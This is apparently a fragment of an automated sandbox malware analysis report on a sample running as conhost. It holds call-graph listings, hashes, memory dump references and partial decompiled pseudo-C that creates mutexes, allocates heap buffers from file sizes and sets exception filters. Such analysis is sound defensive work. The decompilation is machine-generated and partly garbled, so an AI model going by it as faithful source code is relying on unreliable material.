17564->17565 17565->17563 17566 7ff6935f0620 121 API calls 17565->17566 17567 7ff6935f0cc5 malloc 17566->17567 17569 7ff6935f0ceb 17567->17569 17570 7ff6935f0d28 17567->17570 17569->17517 17571 7ff6935e2090 121 API calls 17570->17571 17572 7ff6935f0d30 17571->17572 17572->17569 17573 7ff6935f0620 121 API calls 17572->17573 17574 7ff6935f0d3a 17573->17574 17576 7ff6935f0cd0 124 API calls 17575->17576 17577 7ff6935f161e 17576->17577 17578 7ff6935f1490 124 API calls 17577->17578 17579 7ff6935f1642 17578->17579 17580 7ff6935f0cd0 124 API calls 17579->17580 17581 7ff6935f165e 17580->17581 17582 7ff6935f1490 124 API calls 17581->17582 17583 7ff6935f1682 17582->17583 17584 7ff6935f0cd0 124 API calls 17583->17584 17585 7ff6935f169e 17584->17585 17586 7ff6935f1490 124 API calls 17585->17586 17587 7ff6935f16c2 17586->17587 17588 7ff6935f0cd0 124 API calls 17587->17588 17589 7ff6935f16e5 17588->17589 17629 7ff6935e89b0 17589->17629 17592 7ff6935f1490 124 API calls 17593 7ff6935f1709 17592->17593 17594 7ff6935f1020 124 API calls 17593->17594 17595 7ff6935f1714 17594->17595 17634 7ff6935cf280 RtlCaptureContext RtlUnwindEx abort 17595->17634 17619 7ff6935e78f4 17618->17619 17620 7ff6935e78e9 17618->17620 17622 7ff6935e6400 121 API calls 17619->17622 17620->17619 17621 7ff6935e7990 17620->17621 17626 7ff6935e79ae memcpy 17621->17626 17627 7ff6935e7935 17621->17627 17623 7ff6935e7908 17622->17623 17624 7ff6935e7930 17623->17624 17625 7ff6935e7925 memcpy 17623->17625 17624->17627 17628 7ff6935e7981 memcpy 17624->17628 17625->17624 17626->17627 17627->17520 17628->17627 17630 7ff6935e89e4 17629->17630 17631 7ff6935e89d8 strlen 17629->17631 17632 7ff6935e5ec0 123 API calls 17630->17632 17631->17630 17633 7ff6935e89f1 17632->17633 17633->17592 17637 7ff6935f108a 17636->17637 17638 7ff6935f1198 17636->17638 17641 7ff6935f10c8 17637->17641 17650 7ff6935f10a2 17637->17650 17639 7ff6935cec00 17 API calls 17638->17639 17640 7ff6935f119d 17639->17640 17640->17637 17640->17641 17645 

                        Control-flow Graph (rendered graph not preserved; basic blocks are address ranges marked Executed / Not Executed)
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strcmp$_stricmp
                        • String ID: KF $y$}
                        • API String ID: 3398372305-1747734038
                        • Opcode ID: c4f4c2f7a25e560a8a19292323215d9eaefe0a90f89513e6a38fedf744fe5a7d
                        • Instruction ID: d4f29b6e4cdc15710aed42a143621a0b9dbe8d64064f2d40dfa9c279b290a152
                        • Opcode Fuzzy Hash: c4f4c2f7a25e560a8a19292323215d9eaefe0a90f89513e6a38fedf744fe5a7d
                        • Instruction Fuzzy Hash: 21229266A08BC185EB31CB29E4063BA77A8FF59788F4491B5DA8C93756EF7CD144C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph (rendered graph not preserved; basic blocks are address ranges marked Executed / Not Executed)
                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: FolderPathwcscat$CreateMutex_stricmp_wcsicmp
                        • String ID:
                        • API String ID: 1866625073-0
                        • Opcode ID: 901b074a1553078cb34851cb21b9db49ee9037731df52840897e38d2b090242d
                        • Instruction ID: f02e10ea792c15ffb19418c2ce29e13831f1c4f984bce1efc5645357e86bdad8
                        • Opcode Fuzzy Hash: 901b074a1553078cb34851cb21b9db49ee9037731df52840897e38d2b090242d
                        • Instruction Fuzzy Hash: D052C56190CBC291FB319B28E4163BA67A8FF99788F445171DE8CA3792EF6DD181C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph (rendered graph not preserved; basic blocks are address ranges marked Executed / Not Executed)
                        C-Code - Quality: 49%
                        			E00007FF67FF6935C1190(void* __edi, void* __esp) {
                        				signed char _v120;
                        				char _v168;
                        				void* __rbx;
                        				void* __rsi;
                        				void* __rbp;
                        				void* __r13;
                        				_Unknown_base(*)()* _t30;
                        				void* _t32;
                        				intOrPtr _t39;
                        				void* _t48;
                        				intOrPtr _t50;
                        				signed int _t52;
                        				signed int _t55;
                        				void* _t57;
                        				intOrPtr* _t87;
                        				long long _t88;
                        				intOrPtr* _t89;
                        				intOrPtr _t90;
                        				signed short* _t91;
                        				signed short* _t92;
                        				long long _t93;
                        				intOrPtr* _t95;
                        				intOrPtr _t97;
                        				long long* _t104;
                        				intOrPtr* _t109;
                        				signed short* _t110;
                        				signed long long _t111;
                        				void* _t113;
                        				signed short* _t114;
                        				long long _t118;
                        				void* _t123;
                        				void* _t124;
                        
                        				_t111 =  *0x935f89c0; // 0x7ff6936020d0
                        				r9d =  *_t111;
                        				memset(__edi, 0, 0xd << 0);
                        				_t57 = __edi + 0xd;
                        				if (r9d != 0) goto 0x935c148b;
                        				_t97 =  *0x935f88e0; // 0x7ff693602080
                        				goto 0x935c11f9;
                        				if ( *((intOrPtr*)( *[gs:0x30] + 8)) ==  *[gs:0x30]) goto 0x935c1434;
                        				Sleep(??);
                        				asm("lock dec eax");
                        				if (_t113 != 0) goto 0x935c11e8;
                        				_t109 =  *0x935f88f0; // 0x7ff693602088
                        				if ( *_t109 == 1) goto 0x935c144b;
                        				if ( *_t109 == 0) goto 0x935c14b4;
                        				 *0x9360201c = 1;
                        				if ( *_t109 == 1) goto 0x935c1460;
                        				if (0 == 0) goto 0x935c1481;
                        				_t87 =  *0x935f8850; // 0x7ff6935f7a20
                        				_t88 =  *_t87;
                        				if (_t88 == 0) goto 0x935c125c;
                        				r8d = 0;
                        				E00007FF67FF6935CDBF0( *_t88());
                        				_t30 = SetUnhandledExceptionFilter(??);
                        				_t104 =  *0x935f88d0; // 0x7ff693602110
                        				 *_t104 = _t88;
                        				_t32 = E00007FF67FF6935CDA00(E00007FF67FF6935E1120(_t30, 0x7ff6935c1000));
                        				_t89 =  *0x935f8870; // 0x7ff6935c0000
                        				 *0x93602010 = _t89;
                        				E00007FF67FF6935E1210(_t32);
                        				_t90 =  *_t89;
                        				if (_t90 != 0) goto 0x935c12c3;
                        				goto 0x935c1308;
                        				if (2 == 0) goto 0x935c12dd;
                        				if (2 == 0) goto 0x935c12dd;
                        				_t91 = _t90 + 2;
                        				_t52 =  *_t91 & 0x0000ffff;
                        				if (_t52 - 0x20 <= 0) goto 0x935c12b0;
                        				r8d = 1;
                        				r8d = r8d ^ 0x00000001;
                        				_t48 =  ==  ? r8d : 1;
                        				goto 0x935c12bf;
                        				if (_t52 - 1 - 0x1f > 0) goto 0x935c1301;
                        				asm("o16 nop [cs:eax+eax]");
                        				_t92 =  &(_t91[1]);
                        				if (_t97 - 1 - 0x1f <= 0) goto 0x935c12f0;
                        				 *0x93602008 = _t92;
                        				r8d =  *_t111;
                        				if (r8d == 0) goto 0x935c1326;
                        				if ((_v120 & 0x00000001) != 0) goto 0x935c142a;
                        				 *0x935f2000 = 0xa;
                        				_t10 =  *0x93602038 + 1; // 0x7ff898063ca1
                        				r13d = _t10;
                        				_t122 = r13d << 3;
                        				malloc(??);
                        				_t110 =  *0x93602030; // 0x2954bdc1770
                        				_t114 = _t92;
                        				if (r12d <= 0) goto 0x935c13ab;
                        				asm("o16 nop [eax+eax]");
                        				_t93 =  *((intOrPtr*)(_t110 + _t111 * 8));
                        				if ( *_t93 == 0) goto 0x935c1420;
                        				r8d = 1;
                        				if ( *((short*)(_t93 + ( &_v168 + 1) * 2 - 2)) != 0) goto 0x935c1370;
                        				malloc(??);
                        				 *((long long*)(_t114 + _t111 * 8)) = _t93;
                        				memcpy(??, ??, ??);
                        				if ( *0x93602038 != _t111 + 1) goto 0x935c1358;
                        				_t22 = _t122 - 8; // -8
                        				 *((long long*)(_t114 + _t22)) = 0;
                        				 *0x93602030 = _t114; // executed
                        				E00007FF67FF6935CD7F0();
                        				_t95 =  *0x935f8880; // 0x7ff6936036c8
                        				_t118 =  *0x93602028; // 0x2954bdc66d0
                        				 *((long long*)( *_t95)) = _t118;
                        				_t39 = E00007FF67FF6935C15C0(_t91[1] & 0x0000ffff, _t57, 0, __esp + 0xc,  &_v168 + 1 +  &_v168 + 1, _t111 + 1, r13d << 3, _t123, _t124);
                        				_t50 =  *0x93602020; // 0x0
                        				 *0x93602024 = _t39;
                        				if (_t50 == 0) goto 0x935c14d2;
                        				_t55 =  *0x9360201c; // 0x0
                        				if (_t55 == 0) goto 0x935c1499;
                        				return _t39;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
                        • String ID:
                        • API String ID: 772431862-0
                        • Opcode ID: 69d72e7a95a54f0f240f20614655ae9cf3a95e6a0382e510142ec386b1f4bd1f
                        • Instruction ID: 2e93e29f6a05b8ef5b57c67f80542a32745f0c1f905bde8138a60332d96a3d4a
                        • Opcode Fuzzy Hash: 69d72e7a95a54f0f240f20614655ae9cf3a95e6a0382e510142ec386b1f4bd1f
                        • Instruction Fuzzy Hash: 8E913735E0970685FE709B56E65277923A9FF48B88F4480B5CE0EE7791DE2CE944D300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph (rendered graph not preserved; basic blocks are address ranges marked Executed / Not Executed)
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b468ddba8a89e735bb7ea80bd7e836e68bfad696c14f3fe88ebbdc98ae7802ad
                        • Instruction ID: 569617bb8a696a141d671924bc4baf76ad314b65fdf1b42e9c578bded2ba6d3c
                        • Opcode Fuzzy Hash: b468ddba8a89e735bb7ea80bd7e836e68bfad696c14f3fe88ebbdc98ae7802ad
                        • Instruction Fuzzy Hash: AE12D4669087C291EF319B29E4067BA67A8FF99794F409271DE8CA7792EF7CD140C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 21%
                        			E00007FF67FF6935C3C40(void* __esi, long long __rax, void* __rcx, long* __rdx) {
                        				long long _v48;
                        				char _v56;
                        				long long _v72;
                        				long long _v80;
                        				long _v88;
                        				long long _v96;
                        				long long _v104;
                        				long _t10;
                        				long _t13;
                        				long long _t22;
                        				long* _t25;
                        
                        				_t22 = __rax;
                        				_t25 = __rdx;
                        				E00007FF67FF6935C3250(1, __rax, __rcx); // executed
                        				if (_t22 == 0xffffffff) goto 0x935c3cf0;
                        				_v56 = 0;
                        				_v48 = 0;
                        				_t10 = GetFileSize(??, ??);
                        				r13d = _t10;
                        				 *_t25 = _t10;
                        				GetProcessHeap();
                        				r8d = r13d;
                        				HeapAlloc(??, ??, ??);
                        				r9d = 0;
                        				r8d = 0;
                        				_v72 = 0;
                        				_t13 =  *_t25;
                        				_v80 = 0;
                        				_v88 = _t13;
                        				_v96 = _t22;
                        				_v104 =  &_v56;
                        				E00007FF67FF6935C40AF(); // executed
                        				E00007FF67FF6935C40CD();
                        				if (_t13 < 0) goto 0x935c3d08;
                        				return _t13;
                        			}
                        0x7ff6935c3c40
                        0x7ff6935c3c4a
                        0x7ff6935c3c52
                        0x7ff6935c3c5e
                        0x7ff6935c3c64
                        0x7ff6935c3c72
                        0x7ff6935c3c7b
                        0x7ff6935c3c81
                        0x7ff6935c3c84
                        0x7ff6935c3c86
                        0x7ff6935c3c8c
                        0x7ff6935c3c94
                        0x7ff6935c3c9a
                        0x7ff6935c3c9d
                        0x7ff6935c3ca2
                        0x7ff6935c3cae
                        0x7ff6935c3cb3
                        0x7ff6935c3cbc
                        0x7ff6935c3cc5
                        0x7ff6935c3cca
                        0x7ff6935c3ccf
                        0x7ff6935c3cd9
                        0x7ff6935c3ce0
                        0x7ff6935c3cef

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Heapwcslen$AllocFileProcessSize
                        • String ID:
                        • API String ID: 3094376029-0
                        • Opcode ID: 058233490db6aa5e7f0c3b2af6205fbd4667df6ba89ca657c3cbb8571d00b610
                        • Instruction ID: 351975a60c0d89fb38b6b8bc75b77a45b5032cc171b3fc0847bcdee804e9aef5
                        • Opcode Fuzzy Hash: 058233490db6aa5e7f0c3b2af6205fbd4667df6ba89ca657c3cbb8571d00b610
                        • Instruction Fuzzy Hash: 0211D332A04A5445EB22DB66B807B477694FB88BBCF800275DE6D57794EF7CC485C700
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
                        • String ID: JiAlAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaaAaaAAaAAaaaaaaaAaaaAAAAAaaaa$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
                        • API String ID: 2382646235-3489439334
                        • Opcode ID: 0dbcbef70c84b9ceba19dadba48f77d72e564724fb94e55be91cebba18804d16
                        • Instruction ID: d6e3435b7ac7cbf9eb3c57ebc7bf190bd72677eb73ba9f670749d11bf179adee
                        • Opcode Fuzzy Hash: 0dbcbef70c84b9ceba19dadba48f77d72e564724fb94e55be91cebba18804d16
                        • Instruction Fuzzy Hash: C1619075A0864385FB358B26E8132B537A8FF58785F8440B6C96DE73A0EE7CA546D310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 144 7ff6935d2100-7ff6935d2117 145 7ff6935d22f0-7ff6935d22fd call 7ff6935d6420 144->145 146 7ff6935d211d-7ff6935d2122 144->146 149 7ff6935d2128-7ff6935d2136 145->149 153 7ff6935d2303-7ff6935d2306 145->153 148 7ff6935d22d8-7ff6935d22df 146->148 146->149 150 7ff6935d22e5-7ff6935d22e8 148->150 151 7ff6935d213c call 7ff6935d1710 148->151 149->150 149->151 155 7ff6935d2141-7ff6935d2147 151->155 153->148 156 7ff6935d2308-7ff6935d2314 call 7ff6935d6420 153->156 158 7ff6935d2180-7ff6935d218d call 7ff6935d6420 155->158 159 7ff6935d2149-7ff6935d214e 155->159 156->151 164 7ff6935d231a 156->164 162 7ff6935d2150-7ff6935d216c TlsGetValue 158->162 168 7ff6935d218f-7ff6935d2192 158->168 161 7ff6935d21a0-7ff6935d21b2 TlsGetValue 159->161 159->162 165 7ff6935d21b4-7ff6935d21c4 call 7ff6935d1250 161->165 166 7ff6935d216e-7ff6935d217b 161->166 162->165 162->166 164->155 165->166 173 7ff6935d21c6-7ff6935d21c9 165->173 168->161 170 7ff6935d2194-7ff6935d2199 call 7ff6935d6420 168->170 170->161 173->166 174 7ff6935d21cb-7ff6935d2206 GetCurrentThreadId CreateEventA call 7ff6935d7be0 173->174 178 7ff6935d220c-7ff6935d226a GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 174->178 179 7ff6935d235d-7ff6935d2385 call 7ff6935d15e0 174->179 180 7ff6935d2270-7ff6935d229d GetThreadPriority 178->180 181 7ff6935f1b26-7ff6935f1b54 abort 178->181 179->181 183 7ff6935d22a3-7ff6935d22a8 180->183 184 7ff6935d2338-7ff6935d2348 call 7ff6935d6420 180->184 197 7ff6935f1b60 181->197 188 7ff6935d2320-7ff6935d232e 183->188 189 7ff6935d22aa 183->189 184->188 194 7ff6935d234a-7ff6935d234d 184->194 191 7ff6935d22ae-7ff6935d22bb TlsSetValue 188->191 189->191 191->181 195 7ff6935d22c1-7ff6935d22d1 191->195 194->189 196 7ff6935d2353-7ff6935d2358 call 7ff6935d6420 194->196 196->189 197->197
                        C-Code - Quality: 91%
                        			E00007FF67FF6935D2100(void* __ecx, void* __rdx) {
                        				void* __rbx;
                        				void* __rdi;
                        				void* __rsi;
                        				void* __rbp;
                        				void* __r12;
                        				void* _t6;
                        				void* _t9;
                        				void* _t10;
                        				void* _t11;
                        				intOrPtr _t18;
                        				intOrPtr _t19;
                        				void* _t22;
                        				void* _t26;
                        				intOrPtr* _t27;
                        				void* _t28;
                        				void* _t30;
                        				void* _t31;
                        				void* _t32;
                        
                        				_t27 =  *0x935f8900; // 0x7ff6936023e0
                        				_t18 =  *_t27;
                        				if (_t18 == 0) goto 0x935d22f0;
                        				if ( *((long long*)(_t18 + 0x28)) != 0) goto 0x935d22d8;
                        				 *((long long*)(_t18 + 0x28)) = 0x936023a8;
                        				if ( *0x936023a8 == 1) goto 0x935d22e5;
                        				E00007FF67FF6935D1710(_t9, _t10, _t11,  *0x936023a8 - 1, _t18, _t22, 0x936023a8, _t26, _t27, _t28, _t30, _t31, _t32);
                        				_t19 =  *_t27;
                        				if (_t19 == 0) goto 0x935d2180;
                        				if ( *((long long*)(_t19 + 0x30)) != 0) goto 0x935d21a0;
                        				 *((long long*)(_t19 + 0x30)) = 0x935f3fb8;
                        				_t6 = TlsGetValue(??);
                        				if (0x935f3fb8 == 0) goto 0x935d21b4;
                        				return _t6;
                        			}
                        0x7ff6935d210a
                        0x7ff6935d2111
                        0x7ff6935d2117
                        0x7ff6935d2122
                        0x7ff6935d2132
                        0x7ff6935d2136
                        0x7ff6935d213c
                        0x7ff6935d2141
                        0x7ff6935d2147
                        0x7ff6935d214e
                        0x7ff6935d2157
                        0x7ff6935d2160
                        0x7ff6935d216c
                        0x7ff6935d217b

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: Value
                        • String ID:
                        • API String ID: 3702945584-0
                        • Opcode ID: 801ea250ad979561cca9b91b448e1b65cb30d2c3504fdc7a6e839ad33adeed12
                        • Instruction ID: 4d2e817964a08b8e149c8641a0ce7127e897936457b4a69dab3339327ed0fad5
                        • Opcode Fuzzy Hash: 801ea250ad979561cca9b91b448e1b65cb30d2c3504fdc7a6e839ad33adeed12
                        • Instruction Fuzzy Hash: 04713A32A09B4685FB719F66E44236837A8FF49B94F5442BADA6CA7390DF3CE444C310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 100%
                        			E00007FF67FF6935CF5F0(intOrPtr* __rax, void* __rcx) {
                        				void* _t5;
                        				intOrPtr _t6;
                        				intOrPtr* _t11;
                        				intOrPtr _t13;
                        
                        				_t11 = __rax;
                        				_t13 =  *((intOrPtr*)(__rcx + 0x10));
                        				if (_t13 == 0) goto 0x935cf648;
                        				_t6 =  *0x93602350; // 0x1
                        				_t5 = E00007FF67FF6935D4620(_t6, __rax);
                        				if (_t11 == 0) goto 0x935cf688;
                        				if ( *_t11 - _t13 < 0) goto 0x935cf730;
                        				if ( *((intOrPtr*)(_t11 + 8 + (_t13 - 1) * 8)) == 0) goto 0x935cf6d0;
                        				return _t5;
                        			}
                        0x7ff6935cf5f0
                        0x7ff6935cf5fa
                        0x7ff6935cf604
                        0x7ff6935cf606
                        0x7ff6935cf60c
                        0x7ff6935cf617
                        0x7ff6935cf61f
                        0x7ff6935cf631
                        0x7ff6935cf644

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61d0e131f43305a5ceef6b7d95dd00e15aaba39e5cb556556ad6ea62f87c0173
                        • Instruction ID: 073a9fcff668fcc6fae749bdc7206239f456823ef54f6a8545225caf68b89a8a
                        • Opcode Fuzzy Hash: 61d0e131f43305a5ceef6b7d95dd00e15aaba39e5cb556556ad6ea62f87c0173
                        • Instruction Fuzzy Hash: EA51B732A09B4691FE359F25D4525B823A8FF58B88F9884B6DE0DA73A1DF3CE545C340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: memcpy$wcslen
                        • String ID: $0$@$\??\$basic_string::_M_construct null not valid
                        • API String ID: 1844840824-2971582370
                        • Opcode ID: e0ca755e712fbca67ce55c50b10ec35e500123cbd50fcea896edeb421d257fe0
                        • Instruction ID: 037f4494721d24e3948d6463325042c0a8f0a5b65becacbd853def4e2c191754
                        • Opcode Fuzzy Hash: e0ca755e712fbca67ce55c50b10ec35e500123cbd50fcea896edeb421d257fe0
                        • Instruction Fuzzy Hash: 91514F32608B8591EB70CF15E4523AAB7A8FBC8788F944175EA8D97B99DF7CD104CB00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        C-Code - Quality: 25%
                        			E00007FF67FF6935C2120(void* __ecx, void* __edi, void* __esp, void* __rax, void* __rdx, long long __r8, long long __r9, intOrPtr _a4, long long _a12, long long _a20, long long _a28, long long _a36, long long _a44, long long _a60, long long _a64, long long _a68, long long _a76, long long _a84, char _a100, void* _a112, char _a224, char _a65824, long long _a65832) {
                        				long long _v4;
                        				long long _v12;
                        				void* _t32;
                        				void* _t33;
                        				intOrPtr* _t49;
                        				intOrPtr* _t50;
                        
                        				E00007FF67FF6935CEA40(0x10108);
                        				_a65824 = __r8;
                        				r8d = 0xfffe;
                        				_t33 = __ecx;
                        				_a65832 = __r9;
                        				memset(??, ??, ??);
                        				_a64 =  &_a65824;
                        				E00007FF67FF6935D95C0(__ecx,  &_a224, __rdx, __rdx,  &_a65824);
                        				r9d = 0;
                        				memset(__edi, 0, 0xd << 0);
                        				_a36 =  &_a68;
                        				_a28 =  &_a100;
                        				_t49 =  *0x935f8620; // 0x7ff693602068
                        				_a44 =  &_a60;
                        				_a100 = 0x68;
                        				_a68 = 0;
                        				_a76 = 0;
                        				_a84 = 0;
                        				_a60 = 0;
                        				_a20 = 0;
                        				_a12 = 0;
                        				_a4 = 0x8000000;
                        				_v4 = 0;
                        				_v12 = 0;
                        				 *_t49(); // executed
                        				if (_t33 == 0) goto 0x935c2237;
                        				_t50 =  *0x935f8640; // 0x7ff693602048
                        				_t32 =  *_t50();
                        				E00007FF67FF6935C40CD();
                        				return _t32;
                        			}
                        0x7ff6935c212a
                        0x7ff6935c213d
                        0x7ff6935c2147
                        0x7ff6935c214d
                        0x7ff6935c2152
                        0x7ff6935c215a
                        0x7ff6935c217a
                        0x7ff6935c217f
                        0x7ff6935c218b
                        0x7ff6935c218e
                        0x7ff6935c219e
                        0x7ff6935c21ab
                        0x7ff6935c21b0
                        0x7ff6935c21b7
                        0x7ff6935c21be
                        0x7ff6935c21c9
                        0x7ff6935c21d2
                        0x7ff6935c21db
                        0x7ff6935c21e7
                        0x7ff6935c21f0
                        0x7ff6935c21f9
                        0x7ff6935c2202
                        0x7ff6935c220a
                        0x7ff6935c2212
                        0x7ff6935c221b
                        0x7ff6935c2224
                        0x7ff6935c2226
                        0x7ff6935c2235
                        0x7ff6935c223a
                        0x7ff6935c224c

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
